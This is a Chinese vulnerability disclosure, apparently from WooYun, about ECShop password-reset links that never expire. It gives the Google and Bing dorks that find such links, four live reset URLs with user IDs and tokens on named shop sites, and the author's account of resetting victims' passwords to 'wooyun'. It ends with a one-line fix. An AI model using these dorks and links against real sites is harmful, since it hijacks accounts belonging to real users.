ECShop找回密码功能设计缺陷，修改密码链接没有时效性

可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码



只是不知道用户名无法登陆，只能盲改密码



谷歌

inurl:user.php?act=get_password&uid=

 

打开一个链接：
 

http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0

 

随便输入密码 例如：wooyun


 

已经修改成功，只是不知道用户名无法登陆。



其他搜索引擎



通过bing.com搜索关键词：user.php?act=get_password&uid=


 

找几个例子


 

http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0

密码同样改为wooyun
 

 

 

http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4

 

 

 

http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85

 

 

 

 

修复方案：

对修改密码的code设置一个时效性。